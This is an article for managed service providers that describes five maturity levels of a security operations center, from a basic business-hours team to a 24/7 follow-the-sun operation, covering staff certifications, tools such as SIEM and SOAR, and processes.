5 Levels of security operations center maturity

For MSPs that offer cybersecurity services, the security operations center (SOC) has emerged as a critical strategy for protecting client networks. While security software tools can help prevent some types of attacks, the SOC offers the threat detection, investigation and response capabilities necessary to fend off complex attacks. It also uses information gathered from those incidents to put safeguards and processes in place to prepare for future episodes.

Most small and midsize companies and the managed service providers that work with them don’t have the resources or expertise to set up their own 24/7 SOC. An effective SOC requires constant monitoring, adequate staffing and the ability to equip its staff with the latest security tools and security processes to keep pace with rapidly evolving threats. That’s why many MSPs have turned to third-party SOCs, which provide services they can resell across their client base without the high investment required for staffing and building the infrastructure internally.

Not all SOCs are created equal. MSPs need to evaluate the maturity level of the security operations center they consider doing business with. It’s tempting to use easy-to-understand metrics such as speed and efficiency (mean time to detect or mean time to respond, for example). But that approach is insufficient to ensure MSPs and their clients have access to a thorough analysis and post-mortem of each incident that can help them plan for the future.

A SOC must offer more than just monitoring and alerting — it must provide experience, breadth of security coverage, advanced analysis and modern tools for protecting your clients.

Security Operations Center (SOC) Level Primer

For customers seeking security operations center services, understanding the differences (registration required) between various SOC maturity levels can be the key to ensuring their digital assets are well-protected. Those include:

Level 1: Basic

At the basic level, a SOC operates during business hours and is staffed by a team of analysts with foundational network security and operating systems skills. They might hold certifications such as Security+ and Network+, but their processes and technology are relatively simple. For example, the SOC uses a basic security information and event management (SIEM) system and simple incident escalation procedures with out-of-the-box rules to detect and respond to threats.

Level 2: Intermediate

An intermediate security operations center has 24/7 coverage and is equipped with more advanced skills. The team understands intrusion detection systems (IDS), intrusion prevention systems (IPS), and SOC tools such as SIEM. With certifications such as certified ethical hacker (C|EH) and cybersecurity analyst (CySA+), they’re also beginning to develop threat-hunting capabilities and the ability to respond to emerging threats. Technology-wise, they use a midlevel SIEM and open-source threat intelligence.

Level 3: Advanced

An advanced SOC operates 24/7 and introduces a specialized team with skills in cloud computing, endpoint security, auditing and threat analysis as well as familiarity with various adversary attack tactics and techniques. Key certifications at this level include AWS cloud practitioner and Azure fundamentals. The advanced security operations center uses intermediate endpoint tools and malware sandboxing, and the team manually maintains “allow and block” lists for better control over network traffic.

Level 4: Optimized

At the optimized level, the security operations center operates 24/7 and incorporates a team holding advanced certifications such as global information assurance certification (GIAC), AWS solutions architect and AWS developer. Their skills now include deep experience with live attacks from various advanced persistent threats (APTs) and advanced SOC tools such as security orchestration, automation and response (SOAR). In addition, they possess knowledge of the Bash shell and command language and scripting, which allows for a more efficient and automated response to incidents.

Their processes have evolved to include advanced threat hunting, attack and defend exercises, and the ability to correlate logs across multiple data sources. This level of maturity empowers the SOC to detect and respond to complex threats swiftly and effectively.

Regarding technology, the optimized SOC leverages SOAR, using hundreds of signature-based detections mapped to the MITRE att&ck framework. This combination of advanced skills, processes and technology makes the optimized SOC well-equipped to handle sophisticated cyberthreats.

Level 5: Innovative

The innovative level 5 SOC operates 24/7, utilizing a “follow-the-sun” model with specialized, geographically distributed teams. At this level, the teams boast a comprehensive skill set covering all aspects of defensive and offensive security tools and development and AI/ML expertise. They also add programming skills, such as Python, widely used in cybersecurity for tasks such as automating incident response, data analysis, machine learning/AI and threat modeling, leveraging a state-of-the-art security orchestration automation and response (SOAR) and threat intelligence platform (TIP).

Their certifications range from certified information systems security professional (CISSP) and certified information systems auditor (CISA) and GIAC’s certified incident handler (GHIC).

The innovative SOC boasts advanced processes, including automated runbook mapping, advanced attack and defend exercises and rapid zero-day threat coverage. The technology at this level is state-of-the-art.

Photo: Gorodenkoff / Shutterstock